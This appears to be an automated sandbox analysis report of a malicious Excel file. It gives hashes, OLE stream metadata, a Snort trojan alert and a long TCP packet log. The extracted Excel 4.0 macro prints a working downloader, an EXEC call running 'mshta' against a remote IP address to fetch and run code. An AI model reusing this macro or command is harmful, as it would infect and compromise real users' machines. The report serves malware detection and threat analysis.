SHA512:	191e2b0d0a90906c52a7481ba68791c8f171e903c48734bdee1a59391cedda6a6303449ed1c50abef3d399c295b6af03c187e408c8af1ce9a164106f7acfc3e4
SSDEEP:	1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "1162545482187818.xls"

Indicators

Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary

Code Page:	1251
Author:	xXx
Last Saved By:	xXx
Create Time:	2022-01-27 23:41:00
Last Saved Time:	2022-01-28 06:31:03
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.324918127833
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.263079431268
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	76002
Entropy:	7.62172227998
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

Name:	REEEEEEEE
Type:	3
Final:	False
Visible:	False
Protected:	False
REEEEEEEE3False0Falsepost2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

Name:	REEEEEEEE
Type:	3
Final:	False
Visible:	False
Protected:	False
REEEEEEEE3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/28/22-21:37:25.962825	TCP	2034631	ET TROJAN Maldoc Activity (set)	49168	80	192.168.2.22	91.240.118.172

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 21:37:21.489705086 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.551141024 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.551239014 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.552747011 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.614880085 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.615829945 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.615876913 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.615890026 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.615892887 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.615921974 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.615930080 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.615938902 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.615972996 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.616046906 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.616064072 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.616080046 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.616096973 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.616110086 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.616122007 CET	80	49167	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:21.616134882 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.616149902 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:21.623449087 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:25.899144888 CET	49168	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:25.960695982 CET	80	49168	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:25.960796118 CET	49168	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:25.962825060 CET	49168	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:26.024159908 CET	80	49168	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:26.024713993 CET	80	49168	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:26.024735928 CET	80	49168	91.240.118.172	192.168.2.22
Jan 28, 2022 21:37:26.024847984 CET	49168	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:26.096244097 CET	49169	80	192.168.2.22	164.90.147.135
Jan 28, 2022 21:37:29.104793072 CET	49169	80	192.168.2.22	164.90.147.135
Jan 28, 2022 21:37:34.973876953 CET	49167	80	192.168.2.22	91.240.118.172
Jan 28, 2022 21:37:35.111380100 CET	49169	80	192.168.2.22	164.90.147.135
Jan 28, 2022 21:37:47.242535114 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.421947956 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.422066927 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.422261000 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.601494074 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614145994 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614202976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614243031 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614283085 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614312887 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.614337921 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614357948 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.614378929 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614418983 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614432096 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.614458084 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614497900 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614520073 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.614538908 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.614595890 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.793796062 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.793893099 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.793936014 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.793972015 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.793978930 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794018984 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794048071 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794059992 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794100046 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794121981 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794142962 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794182062 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794219971 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794219971 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794261932 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794281960 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794301033 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794339895 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794353008 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794378042 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794418097 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794433117 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794459105 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794496059 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794514894 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794536114 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794574022 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794593096 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.794611931 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.794663906 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.973804951 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.973886967 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.973929882 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.973969936 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974019051 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974037886 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974060059 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974101067 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974106073 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974142075 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974157095 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974183083 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974225044 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974255085 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974261999 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974302053 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974329948 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974340916 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974379063 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974406958 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974417925 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974458933 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974489927 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974498987 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974540949 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974565029 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974577904 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974617004 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974646091 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974654913 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974693060 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974726915 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974731922 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974771976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974795103 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974809885 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974849939 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974875927 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974888086 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974931002 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.974955082 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.974975109 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975012064 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975033998 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.975050926 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975087881 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975115061 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.975126982 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975169897 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975189924 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.975205898 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975244999 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975276947 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.975281954 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975320101 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975343943 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.975358009 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975399017 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:47.975421906 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:47.975656033 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.154864073 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.154910088 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.154958963 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.154999018 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155016899 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155042887 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155056000 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155085087 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155126095 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155164957 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155167103 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155206919 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155246973 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155251980 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155287027 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155317068 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155328035 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155369997 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155409098 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155410051 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155451059 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155491114 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155492067 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155531883 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155570030 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155572891 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155616045 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155652046 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155654907 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155697107 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155735970 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155735016 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155776978 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155816078 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155817986 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155858040 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155894995 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155898094 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155941010 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.155970097 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.155985117 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156025887 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156064987 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156064987 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156107903 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156146049 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156148911 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156189919 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156228065 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156230927 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156272888 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156311035 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156311035 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156352997 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156390905 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156392097 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156433105 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156472921 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156474113 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156514883 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156552076 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.156554937 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.156636000 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.335774899 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.335829020 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.335870028 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.335912943 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.335946083 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.335974932 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.335978031 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336007118 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336025000 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336031914 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336060047 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336064100 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336095095 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336123943 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336126089 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336153984 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336183071 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336184025 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336213112 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336241961 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336245060 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336282015 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336312056 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336324930 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336354971 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336381912 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336385012 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336416006 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336443901 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336445093 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336476088 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336502075 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336505890 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336536884 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336565971 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336569071 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336596966 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336622953 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336627007 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336657047 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336683035 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336684942 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336714983 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336745024 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336754084 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336786032 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336813927 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336817026 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336846113 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336872101 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336875916 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336906910 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336940050 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.336945057 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336970091 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336993933 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.336997986 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.337018013 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.337043047 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.337044001 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.337068081 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.337091923 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.337095022 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.337116957 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.337157011 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.337534904 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.516396046 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516442060 CET	80	49170	103.206.244.105	192.168.2.22
